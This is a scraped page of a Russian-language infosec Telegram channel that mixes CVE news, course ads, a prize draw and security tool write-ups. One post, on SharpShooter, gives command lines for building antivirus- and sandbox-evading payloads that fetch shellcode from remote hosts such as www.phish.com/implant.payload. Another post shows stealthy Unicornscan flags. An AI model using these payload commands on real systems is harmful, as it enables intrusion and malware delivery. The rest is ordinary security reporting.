codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34787

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

🔎 AI позволяет красть данные!

🪧 Уязвимости в фреймворке Chainlit AI позволяют осуществлять кражу данных посредством чтения файлов и уязвимости SSRF.

🔁 В популярной платформе искусственного интеллекта с открытым исходным кодом Chainlit были обнаружены уязвимости безопасности , которые могут позволить злоумышленникам красть конфиденциальные данные, что, в свою очередь, может обеспечить горизонтальное перемещение внутри уязвимой организации.

🎇 Компания Zafran Security заявила, что эти серьезные уязвимости, получившие общее название ChainLeak , могут быть использованы для утечки ключей API облачных сред и кражи конфиденциальных файлов, а также для проведения атак с подделкой запросов на стороне сервера (SSRF) против серверов, на которых размещены приложения искусственного интеллекта.

⏺️ Подробности об этих двух уязвимостях следующие:

➡️ CVE-2026-22218 (CVSS: 7.1) — уязвимость произвольного чтения файлов в процессе обновления "/project/element", позволяющая авторизованному злоумышленнику получить доступ к содержимому любого файла, доступного для чтения службой, в свою собственную сессию из-за отсутствия проверки полей контроллера пользователя.

➡️ CVE-2026-22219 (CVSS: 8.3) — уязвимость SSRF в потоке обновления "/project/element" при настройке с использованием бэкэнда уровня данных SQLAlchemy, которая позволяет злоумышленнику выполнять произвольные HTTP-запросы к внутренним сетевым службам или конечным точкам облачных метаданных с сервера Chainlit и сохранять полученные ответы.

❗️ Будьте внимательны!

#ai #ssrf #cve #chainleak

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

❗️ Уязвимость в Python библиотеке для ИИ

🪧 В библиотеках Python с открытым исходным кодом для искусственного интеллекта, выпущенных Apple (FlexTok), NVIDIA (NeMo) и Salesforce (Uni2TS), обнаружены уязвимости, позволяющие удаленное выполнение кода (RCE) при загрузке файла модели со вредоносными данными.

🧾 «Уязвимости возникают из-за того, что библиотеки используют метаданные для настройки сложных моделей и конвейеров, где используемая сторонняя библиотека создает экземпляры классов, используя эти метаданные. Уязвимые версии этих библиотек просто выполняют предоставленные данные как код. Это позволяет злоумышленнику внедрить произвольный код в метаданные модели, который будет автоматически выполняться при загрузке этих модифицированных моделей уязвимыми библиотеками», — заявило подразделение 42 Palo Alto Networks

💻 Речь идет о сторонней библиотеке Hydra от Meta, а именно о функции «hydra.utils.instantiate()», которая позволяет запускать код с использованием функций Python, таких как os.system(), builtins.eval() и builtins.exec().

🔎 Уязвимости, отслеживаемые как CVE-2025-23304 (NVIDIA) и CVE-2026-22584 (Salesforce), были устранены соответствующими компаниями

А вы используете эти библиотеки в работе?

#python #ai #cve #hydra

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Ваша ИТ-безопасность — это вы. И сегодня это самое уязвимое место.

Атаки стали точечными. Цель — не ваш компьютер, а конкретно вы: ваши данные для шантажа, доступ для мошенничества, ресурсы для скрытого майнинга.

В статье — разбор реальных векторов атаки и как их предотвратить:
⏺️Фишинг, который невозможно отличить от письма коллеги.
⏺️Уязвимости в привычном ПО, которые вы забыли обновить.
⏺️Социнженерия, где ваша вежливость становится оружием против вас.

👉Мы подготовили чек-лист по настройке базовой защиты, рекомендации по выбору EDR-решений для дома и стратегию резервного копирования, которая переживет любую ransomware-атаку.

Узнайте ➡️ в статье, как обезопасить свой компьютер и данные раз и навсегда.

#Ransomware #РезервноеКопирование #ЗащитаДанных #CodebyNet

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Сборная России поедет в Австралию защищать чемпионский титул по кибербезопасности

Российские старшеклассники примут участие в Международной олимпиаде по кибербезопасности, которая пройдет с 27 июня по 2 июля в Сиднее. Подготовкой команды, как и в прошлом году, займутся эксперты Центрального университета и «Лаборатории Касперского».

Напомним, что в 2025 году их усилия принесли блестящий результат: на первой такой олимпиаде в Сингапуре российская сборная завоевала абсолютный комплект наград — 8 медалей из 8 возможных.

Сейчас идет формирование новой команды. К отбору приглашают школьников от 14 лет, увлеченных информационной безопасностью. Регистрация продлится до 7 февраля, после чего кандидатов ждут онлайн-испытания и очные туры.

У сборной России будет шанс повторить прошлогодний триумф на мировой арене.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

GEOLOCATOR_ULTIMATE

Это инструмент геолокации, написанный на Python, который использует множество источников информации и сопоставляет данные из различных источников.
это продвинутый инструмент геолокации, который объединяет более 20 различных источников для определения физического местоположения IP-адреса или домена. Этот инструмент предназначен для специалистов по безопасности, исследователей, придерживающихся этических норм, и сетевых команд.

📕Характиристика:
1️⃣Автономная база данных (MaxMind GeoLite2)
2️⃣Расширенный анализ консенсуса
3️⃣Выявление угроз и репутации
4️⃣Генерация отчетов в формате JSON
5️⃣Интуитивно понятный интерфейс терминала

💻Установка:

git clone https://github.com/hackermexico/geolocator_ultimate.git

cd geolocator_ultimate/


📌Запуск:
Запуск с доменом или IP:
python3 geoultimate.py <TAGRGET>

Сохранить вывод в JSON:
python3 geoultimate.py <TAGRGET> --save


#tools #osint

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🕵️ Категория ФорензикаСледопыт

🎢 Категория РазноеAPT

Приятного хакинга!

Читать полностью…

Codeby

Сегодня ИБ — это не только политики и регламенты, но и автоматизация.
Python помогает решать задачи эффективнее и масштабнее.

Какие библиотеки используете вы? Пишите в комментариях ⬇️

Для тех, кто только начинает свой путь в автоматизации ИБ, отличным стартом станет курс «Основы программирования на Python». Начните обучение 19 января.

#python #автоматизация #libs

Все наши каналы 💬Все наши чаты Для связи с менеджером

Читать полностью…

Codeby

🔍 rnsec — это лёгкий сканер безопасности для React Native и Expo‑приложений, который ищет уязвимости, секреты и ошибки конфигурации до выхода в прод. Утилита работает из коробки одной командой, полностью локально и отлично подходит для встраивания в CI/CD.

⚙️ Основные возможности rnsec

➡️ Анализирует исходники мобильных приложений на React Native и Expo с учётом их типичных паттернов и анти‑паттернов.
➡️ Покрывает Android и iOS, включая платформенные настройки и конфиги (сетевые политики, storage и др.).
➡️ Детектирует небезопасное хранение данных (например, чувствительные данные в AsyncStorage), HTTP‑трафик без шифрования, слабую аутентификацию, рискованные WebView‑настройки и прочие misconfig‑ошибки.
➡️ Использует разбор AST (Abstract Syntax Tree) вместо простого поиска по строкам, что уменьшает шум и ложные срабатывания.
➡️ Генерирует HTML‑дашборд с удобной навигацией по находкам и JSON‑отчёты для автоматической обработки.


⬇️ Установка и запуск
rnsec распространяется через npm как глобальная CLI‑утилита.

npm install -g rnsec


🗓️ Базовый запуск
Перейди в каталог React Native или Expo‑проекта и запусти сканирование.

cd /path/to/your-react-native-app
rnsec scan

Эта команда:
- находит релевантные файлы проекта;
- прогоняет 68+ правил безопасности;
- формирует HTML‑ и JSON‑отчёты, а также краткую сводку в консоли.

🔧 Примеры использования
- Скан текущего проекта с отчётами по умолчанию:
rnsec scan


- Скан конкретного пути:
rnsec scan --path /Users/dev/my-react-native-app


- Кастомные имена отчётов (HTML + JSON):
rnsec scan --html security-report.html --output security.json


#react #scan #cicd #tool

Все наши каналы 💬Все наши чаты Для связи с менеджером

Читать полностью…

Codeby

PH0MBER

PH0MBER — это платформа OSINT, представляющая собой универсальный инструмент для сбора информации и проведения разведки.
Это может помочь вам собрать информацию (например, номера телефонов, IP-адреса, данные о доменных именах и т. д.) из различных общедоступных источников о целевом объекте.
Утилита похожа на MetaSploit Framework по внешнему виду и управлению. Программа не обладает большим или сложным функционалом и подойдёт даже новичкам.

📕Характеристика:
1️⃣Поиск по номеру телефона
2️⃣Поиск по IP-адресу
3️⃣Поиск по MAC-адресу
4️⃣Поиск информации через whois
5️⃣Поиск по имени пользователя

📌Установка:

git clone https://github.com/s41r4j/phomber.git

cd phomber

pip3 install mac-vendor-lookup


💻Использование:
python3 phomber.py

Поиск по номеру телефона:
phone <NUMBER>

Поиск информации с whois:
whois <DOMAIN>


#OSINT #tools

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

🔔 Хотите понять, как проходит WAPT — тестирование на проникновение? Сегодня разберем это подробнее!

Освойте WAPT на практике — старт курса по тестированию веб-приложений на проникновение 22 января!

#WAPT #XSS #OWASP

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

📱 В январе 2026 года в медиапространстве появилась новость: произошла утечка данных 17,5 миллионов аккаунтов Instagram*. Однако официальные заявления Meta* и технические детали от экспертов по кибербезопасности раскрывают более сложную картину.

💫Что стало известно из расследования?
Согласно отчету компании по кибербезопасности Malwarebytes, история началась 7 января 2026 года, когда на хакерском форуме BreachForums были опубликованы крупные структурированные файлы (JSON и TXT) с данными. Их происхождение связывают с хакером под псевдонимом «Solonik».
Какие данные были обнародованы:
- Имена пользователей (логины) и полные имена
- Адреса электронной почты
- Международные номера телефонов
- Частичные физические адреса
- Внутренние идентификаторы пользователей (User IDs)

Важно: в утечке не фигурировали пароли пользователей. Эксперты Malwarebytes предполагают, что источником утечки мог быть инцидент, связанный с API Instagram*, который произошел еще в 2024 году.


💫 В ответ на эти сообщения официальный аккаунт Instagram* в X опубликовал заявление:
«Мы устранили проблему, которая позволяла внешней стороне запрашивать письма для сброса пароля для некоторых людей. Не было взлома наших систем, и ваши аккаунты в Instagram защищены. Вы можете игнорировать эти письма — приносим извинения за возможную путаницу».

Таким образом, Meta* не признает факт «взлома» (breach) в классическом понимании, а описывает инцидент как эксплуатацию технической уязвимости в системе восстановления пароля, которая позволяла злоумышленникам массово подтверждать email-адреса, привязанные к аккаунтам.

💫Между версией Malwarebytes (которая говорит о «массовой утечке» данных с форума хакеров) и заявлением Meta* (которое отрицает взлом и говорит об устраненной уязвимости) есть явное противоречие. На данный момент Meta* не предоставила официального разъяснения о том, как именно данные оказались на BreachForums, и не подтвердила масштабы потенциально затронутых пользователей.

*Компания Meta, а также её продукты (Instagram) признаны экстремистскими в России

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY — ИТОГИ 🎄

Друзья, спасибо всем, кто принял участие в нашей новогодней лотерее!

Мы рады объявить 10 победителей:

🥇 1 место — iPhone 17
Номер участника: 102

🥈 2 место — Apple Watch
Номер участника: 314

🥉 3 место — AirPods
Номер участника: 307

🎁 4–10 места — подписка HackerLab PRO на 1 месяц
Номера участников:
105
313
300
101
312
303
206


Поздравляем всех победителей! ❤️
Спасибо, что учитесь и развиваетесь вместе с нами!

Что делать победителям?
Пожалуйста, напишите нам в личные сообщения @CodebyAcademyBot в течение 48 часов для получения приза согласно регламенту.

📌 Видео с розыгрышем в посте

Напоминаем: в Академии Кодебай в 2026 продолжается обучение по ключевым направлениям кибербезопасности, а также доступны подарочные сертификаты на курсы — отличный старт в Новом году.

Спасибо, что вы с нами.
До встречи на обучении и в следующих розыгрышах! 😎

#кодебай #розыгрыш #итоги #онлайнобучение #курсыиб #cybersecurity

Читать полностью…

Codeby

Ваши данные уже в сети. Вы уверены, что они в безопасности?

Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов

Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга

92% людей не контролируют свой цифровой след — будьте в меньшинстве!
🔴 Начать обучение запись до 26 января!

✈️По всем вопросам @CodebyAcademyBot

Читать полностью…

Codeby

Друзья, давайте немного бустанем канал: /channel/boost/codeby_sec

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебХаос на АЗС

Приятного хакинга!

Читать полностью…

Codeby

Go-Hash

Инструмент идентификации алгоритмов для хешей, таких как MD5, SHA1, SHA256, SHA512, MYSQL.

📕Характеристика:
1️⃣Очень простой интерфейс.
2️⃣Поддержка основных алгоритмов (MD5, SHA1, SHA256, SHA512, MYSQL)


💻Установка:

git clone https://github.com/HunxByts/Go-Hash.git

cd Go-Hash

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 gohash.py


#tools #hash #cryptography

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

⚡️ ZDNS — высокоскоростной DNS-резолвер и утилита командной строки для выполнения крупномасштабных измерений DNS. Написан на языке Go и содержит собственный код рекурсивного разрешения и кэш, оптимизированный для поиска разнообразных наборов имен.

💻 Установка

git clone https://github.com/zmap/zdns.git
cd zdns
make install


Состоит из следующих типов модулей:
🔴Модули Raw DNS предоставляют необработанный DNS-ответ от сервера, аналогичный dig, но в формате JSON. Существует модуль практически для каждого типа DNS-записи.
A, AAAA, AFSDB, ANY, ATMA, AVC, AXFR, BINDVERSION, CAA, CDNSKEY, CDS, CERT, CNAME, CSYNC, DHCID, DMARC, DNSKEY, DS, EID, EUI48, EUI64, GID, GPOS, HINFO, HIP, HTTPS, ISDN, KEY, KX, L32, L64, LOC, LP, MB, MD, MF, MG, MR, MX, NAPTR, NID, NINFO, NS, NSAPPTR, NSEC, NSEC3, NSEC3PARAM, NSLOOKUP, NULL, NXT, OPENPGPKEY, PTR, PX, RP, RRSIG, RT, SVCBS, MIMEA, SOA, SPF, SRV, SSHFP, TALINK, TKEY, TLSA, TXT, UID, UINFO, UNSPEC, URI.

🔴Модули Lookup предоставляют более полезные ответы, когда требуется несколько запросов (например, выполнение дополнительного A поиска для IP-адресов, если получен NS в NSLOOKUP).
🔴Модули Misc предоставляют другие дополнительные средства запроса серверов (например, bind.version).

🔺Использование
Инструмент состоит из библиотеки рекурсивного резолвера и оболочки CLI.

1️⃣Raw DNS - echo "censys.io" | zdns A
В выводе для данной команды будет содержаться следующая информация:
{
"name": "censys.io",
"results": {
"A": {
"data": {
"additionals": [
{
"flags": "",
"type": "EDNS0",
"udpsize": 512,
"version": 0
}
],
"answers": [
{
"answer": "104.18.10.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
},
{
"answer": "104.18.11.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
}
],
"protocol": "udp",
"resolver": "[2603:6013:9d00:3302::1]:53"
},
"duration": 0.285295416,
"status": "NOERROR",
"timestamp": "2024-08-23T13:12:43-04:00"
}
}
}


2️⃣ Модуль Lookup. Необработанные DNS-ответы часто не содержат нужных данных. Например, ответ MX может не включать связанные A записи в дополнительном разделе, что требует дополнительного поиска. Для устранения этого недостатка инструмент также предоставляет несколько модулей поиска: alookup, mxlookup, nslookup.

🔴alookup работает аналогично nslookup и отслеживает записи CNAME.
🔴mxlookup дополнительно выполняет поиск A для IP-адресов, соответствующих записи обмена.
🔴nslookup дополнительно выполняет поиск A/AAAA для IP-адресов, соответствующих записи NS.
echo "censys.io" | zdns mxlookup --ipv4-lookup

В выводе для данной команды будет содержаться следующая информация:
{
"name": "censys.io",
"results": {
"MXLOOKUP": {
"data": {
"exchanges": [
{
"class": "IN",
"ipv4_addresses": [
"209.85.202.27"
],
"name": "alt1.aspmx.l.google.com",
"preference": 5,
"ttl": 300,
"type": "MX"
},
{
"class": "IN",
"ipv4_addresses": [
"142.250.31.26"
],
"name": "aspmx.l.google.com",
"preference": 1,
"ttl": 300,
"type": "MX"
}
]
},
"duration": 0.154786958,
"status": "NOERROR",
"timestamp": "2024-08-23T13:10:11-04:00"
}
}
}


#tools #DNS #resolver

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Освойте UserGate и повысьте уровень защиты своей ИТ-инфраструктуры!

Бесплатный онлайн-курс поможет вам шаг за шагом освоить внедрение и настройку UserGate — без лишней теории, с упором на практику.

В программе курса:
✅ Настройка сетевых зон, NAT, VPN, кластеров, фильтрации на уровне приложений и правил межсетевого экрана
✅ Интеграция с LDAP и Active Directory, фильтрация контента, системы обнаружения вторжений и обратный прокси
✅ Пошаговые видеоуроки, практические упражнения и итоговое тестирование

По завершении курса Вы получите:
⭐ именной сертификат
📕 PDF-инструкции
📋 чек-листы и готовые конфигурации, которые помогут в дальнейшей работе

Пройдите курс в удобное время — запись уже доступна.

Реклама. ООО "ИНФРАТЕХ". ИНН 5024197250

Читать полностью…

Codeby

❗️РКН будет фильтровать трафик с помощью ИИ

Роскомнадзор (РКН) планирует создать и внедрить механизм фильтрации интернет-трафика с использованием инструментов машинного обучения в этом году. На эти цели выделят 2,27 млрд рублей, следует из плана цифровизации РКН, который направлен правкомиссии по цифровому развитию. По мнению экспертов, с помощью таких инструментов РКН может научиться эффективнее блокировать запрещенные ресурсы, а также ограничивать работу VPN-сервисов.

С помощью ТСПУ уже заблокировано более 1 млн запрещенных в России ресурсов. За день ТСПУ ограничивает доступ в среднем к 5500 новых сетевых адресов и доменов, рассказывал в интервью «Известям» замглавы РКН Олег Терляков в июне 2025 года.

Инструменты машинного обучения на ТСПУ могут использоваться для разработки и автоматического применения правил фильтрации трафика, не исключает эксперт организации RKS-Global, пожелавший остаться анонимным: например, чтобы находить и блокировать трафик VPN-сервисов. Кроме того, полагает он, такие инструменты позволяют осуществлять поиск по текстам на разных языках и по изображениям и видео: «Так, Китай уже вовсю использует ИИ в мониторинге интернета».

Впрочем, не для всех систем РКН применение ИИ оказалось одинаково действенным. Так, в системе мониторинга использования персональных данных в интернете служба тестировала нейросети, но, по признанию замруководителя РКН Милоша Вагнера, их эффективность оказалась не так высока: «В тестовом режиме посмотрели на работу нейросетей, оценили их результативность в 60%. <…> Чтобы ожидаемая точность анализа повысилась <…>, нужно было составить обучающие датасеты по объемам, превосходящим мониторинг всех сайтов, который Роскомнадзор проводил за несколько лет. Такие трудозатраты в условиях необходимости экономии средств мы сочли на этом этапе преждевременными».

Источник: https://www.forbes.ru/tekhnologii/553640-algoritmiceskie-upraznenia-rkn-budet-fil-trovat-trafik-s-pomos-u-masinnogo-obucenia

#news #ркн #vpn #ии

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

💫 Перед вами — четыре снимка с мест событий, собранные в одно дело. Сможете вычислить угрозу?

1. Какой термин скрывается за этими кадрами?
2. Какой его главный и самый опасный принцип?

Включайте режим сыска. Сопоставляйте улики, стройте версии. Ваши теории ждём в комментариях!💻

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

🦈 SharpShooter

Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.

Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.

Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.

Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.

⚡️ Установка

git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt


🦇 Использование
1️⃣Создание JavaScript-полезной нагрузки без этапов выполнения, ориентированной на версию 4 платформы .NET. В данном примере создаётся полезная нагрузка с именем foo.js в выходной директории. Шелл-код считывается из файла ./raw.txt. Полезная нагрузка пытается обеспечить обход песочницы путём привязки выполнения к домену CONTOSO и проверки на наличие известных артефактов виртуальных машин.
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3


2️⃣Создаётся VBS-полезная нагрузка, которая осуществляет доставку как через Web, так и через DNS. Полезная нагрузка попытается загрузить сжатый C#-файл, выполняющий шелл-код в файле csharpsc.txt.
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4


3️⃣Далее показано, как создать промежуточную полезную нагрузку JS, которая выполняет веб-доставку и получает полезную нагрузку с http://www.phish.com/implant.payload. Сгенерированная полезная нагрузка попытается обойти песочницу и скомпилировать полученную полезную нагрузку.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl


4️⃣Создаётся макрос VBA, который использует COM-интерфейс XMLDOM для получения и выполнения размещённой таблицы стилей.
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl


P.S. Используйте этот инструмент только в образовательных целях!

#tools #payload #SharpShooter

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки

Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.


🔘 Ключевые особенности и преимущества
- Отдельные процессы для отправки и прослушивания пакетов позволяют достигать высокой скорости и эффективности
- Поддержка TCP (SYN, ACK, FIN, NULL, XMAS, произвольные флаги), UDP, ICMP, ARP-сканирования и составных режимов
- Встроенная поддержка сигнатур p0f v3 для анализа характеристик TCP/IP стека и определения операционной системы удалённого хоста (более 50 отпечатков)
- Возможность эмулировать поведение TCP/IP стека различных ОС (Linux, Windows, macOS и др.) при отправке пакетов для обхода простых систем обнаружения
- Для UDP-сканирования может отправлять специфичные для служб пакеты (DNS, HTTP, SIP, SSDP), повышая точность обнаружения

➡️ Установка
sudo apt install unicornscan

Проверка
unicornscan -h


➡️ Базовый TCP SYN-скан
sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100

Команда выполнит подробное TCP SYN-сканирование портов с 1 по 1024 на хосте 192.168.1.100 с немедленным выводом в реальном времени, обработкой всех типов ответов (открытые, закрытые, фильтруемые порты) и максимальной детализацией технических параметров сетевых пакетов

➡️ Быстрый порт-сканинг с указанием интерфейса и TTL
sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24

Команда выполнит быстрое сканирование всех 65 тысяч портов на всех хостах в сети 10.0.0.0/24, используя сетевой интерфейс eth0, со скоростью 2000 пакетов в секунду и значением TTL 64 для маскировки под стандартный Linux-трафик

➡️ TCP-сканирование с записью трафика для последующего анализа
unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50

Команда выполнит нестандартное TCP-сканирование с флагами FIN, PSH и URG (без SYN) портов 22, 80 и 443 на хосте 192.168.1.50, используя случайные исходные порты и сохраняя все полученные ответные пакеты в файл scan_capture.pcap для последующего сетевого анализа

➡️ Ограничения
- Unicornscan создан для быстрого сбора данных (открытые порты, живые хосты, ОС). Он не заменяет полноценные сканеры уязвимостей или сложные скриптовые движки, такие как у Nmap
- Интерпретация вывода, особенно в детальном режиме, требует понимания сетевых протоколов
- Для сканирования интернет-хостов составные режимы с ARP (-mA+...) не работают, так как требуют нахождения в одном широковещательном домене (L2)

#tools #audit #scanner #TCP #UDP #SYN

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

Защита от прослушки: практический взгляд без мифов

Средства негласного получения информации давно вышли за пределы спецслужб.
Диктофоны, радиопередатчики, BLE-трекеры и модифицированные устройства свободно доступны и регулярно используются в мошенничестве, корпоративных конфликтах и бытовых инцидентах.

Понимание принципов их работы — базовый навык для специалистов по безопасности, OSINT и технической разведке.

Мы подготовили PDF-гайд
«Инструкция: защита от популярных методов прослушки» — авторский материал от эксперта OSINT.

В гайде разобрано:

🟧 классификация устройств скрытого наблюдения: записывающие и транслирующие
🟧 диктофоны, радиожучки, GSM/LTE-трекеры, BLE/UWB-метки и нестандартные решения
🟧 ключевые демаскирующие признаки: питание, радиоканалы, конструктив
🟧 методы обнаружения: визуальный контроль, радиомониторинг, анализ спектра
🟧 практические способы противодействия в быту, офисе и автомобиле

Материал ориентирован на реальные сценарии, без художественных допущений и маркетинговых преувеличений.

➡️Скачать гайд бесплатно
https://wipro-guide.codeby.school/

Гайд будет полезен:
специалистам ИБ и OSINT
техническим и управленческим сотрудникам
тем, кто работает с чувствительной информацией

В конце гайда — рекомендации по дальнейшему профессиональному развитию в области разведки и анализа данных.

➡️Перейти к гайду
https://wipro-guide.codeby.school/

Читать полностью…

Codeby

🎓Web Cache Vulnerability Scanner (WCVS)

Быстрый и универсальный CLI-сканер для обнаружения уязвимостей отравления веб-кэша (web cache poisoning) и обмана веб-кэша (web cache deception).

Сканер поддерживает множество различных техник отравления и обмана веб-кэша, включает встроенный краулер для обнаружения дополнительных URL-адресов для тестирования, а также способен адаптироваться к конкретному веб-кэшу для более эффективного сканирования. Инструмент обладает широкими возможностями настройки и легко интегрируется в существующие CI/CD-пайплайны.

Установка
1️⃣Готовые двоичные файлы WCVS доступны на странице релизов.
2️⃣ Kali Linux: apt install web-cache-vulnerability-scanner.
3️⃣ Установка с помощью Go: go install -v github.com/Hackmanit/Web-Cache-Vulnerability-Scanner@latest.

⌨️Использование
Инструмент обладает широкими возможностями настройки с помощью флагов. Многие флаги могут содержать непосредственно значение или путь к файлу.

😳 Единственный обязательный флаг -u/--url — указывает на целевой URL-адрес, который необходимо проверить на предмет отравления/обмана веб-кэша. Целевой URL-адрес может быть указан в разных форматах.

Для проверки половины методов WCVS нужны два списка слов: один со словами из заголовков, а другой — со словами из параметров. Списки слов могут находиться в том же каталоге, из которого запускается WCVS, или быть указаны с помощью флагов --headerwordlist/-hw и --parameterwordlist/-pw.

wcvs -u https://example.com
wcvs -u https://example.com -hw "file:/home/user/Documents/wordlist-header.txt" -pw "file:/home/user/Documents/wordlist-parameter.txt"


📝Создание отчета в формате JSON
Если установлен флаг --generatereport/-gr, после сканирования каждого URL-адреса создается и обновляется отчет в формате JSON. Отчет, как и файл журнала, записывается в тот же каталог, из которого запускается WCVS. Чтобы изменить каталог для всех выходных файлов, используйте --generatepath/-gp.

👀Поиск URL-адресов для сканирования
Для обхода URL-адресов необходимо установить --recursivity/-r. Он определяет, на какую глубину рекурсии должен заходить поисковик. По умолчанию WCVS выполняет обход только URL-адресов того же домена.
Для обхода других доменов также можно использовать --recdomains/red. Можно использовать --recinclude/-rin только для обхода URL-адресов, которые наследуют определенную строку. --reclimit/-rl ограничивает количество обходимых URL-адресов для каждой глубины рекурсии.
wcvs -u https://example.com -r 5 -red /home/user/Documents/mydomains.txt
wcvs -u https://example.com -r 5 -rl 2


Флаги для заголовков, параметров, cookie и других данных
🔴--cacheheader/-ch - указывает на пользовательский заголовок кэша, который будет проверяться на наличие совпадений и промахов в кэше;
🔴--setcookies/-sc - указывает на файлы cookie, которые должны быть добавлены в запрос;
🔴--setheaders/-sh - указывает на заголовки, которые должны быть добавлены в запрос;
🔴--setparameters/-sp - указывает на параметры, которые должны быть добавлены в запрос. Хотя их можно просто добавить в URL, в некоторых случаях может быть полезнее добавить их с помощью этого флага;
🔴--post/-post - меняет HTTP-метод с GET на POST;
🔴--setbody/-sb - указывает на тело, которое должно быть добавлено в запрос;
🔴--contenttype/-ct - указывает на значение заголовка Content-Type;
🔴--useragentchrome/-uac меняет User-Agent.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

#WCVS #websecurity #кеширование

Читать полностью…

Codeby

📱 Mobile Verification Toolkit (MVT) 📲📲

Набор утилит для упрощения и автоматизации процесса сбора данных для криминалистической экспертизы, которые помогают выявить потенциальную компрометацию устройств на базе Android и iOS.


⚙️ Установка
Поддерживает установку из исходного кода или из PyPI:
python3 -m venv env
source env/bin/activate
pip install mvt
#OR
pipx install --force git+https://github.com/mvt-project/mvt.git


Использование
MVT предоставляет две команды mvt-ios и mvt-android.
1️⃣ IOS
Для начала работы необходимо создать резервную копию iTunes. Хотя резервные копии содержат лишь часть файлов, хранящихся на устройстве, во многих случаях этого может быть достаточно, чтобы обнаружить некоторые подозрительные артефакты.
После получения зашифрованной резервной копии необходимо сначала расшифровать ее.
mvt-ios decrypt-backup [OPTIONS] BACKUP_PATH


Запуск mvt-ios на резервной копии.
mvt-ios check-backup --output /path/to/output/ /path/to/backup/udid/

Эта команда создаст несколько файлов JSON, содержащих результаты извлечения.

2️⃣ Android
Поскольку вредоносные атаки на Android обычно осуществляются через вредоносные или бэкдорные приложения, первое, что следует сделать, — это извлечь и проверить все установленные пакеты Android и быстро определить, какие из них являются вредоносными или нетипичными с помощью таких сервисов, как VirusTotal.
mvt-android download-apks --output /path/to/folder
MVT_VT_API_KEY=<key> mvt-android download-apks --output /path/to/folder --virustotal


Кроме того, с помощью Android Debug Bridge (adb) можно получить дополнительную диагностическую информацию с телефона. Чтобы проверить устройство Android через adb, сначала необходимо установить Android SDK Platform Tools. Самый простой способ проверить устройство — подключить его через USB. Необходимо включить отладку по USB и подключить устройство к компьютеру.
mvt-android check-adb --output /path/to/results


#android #ios #forensic #tools

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

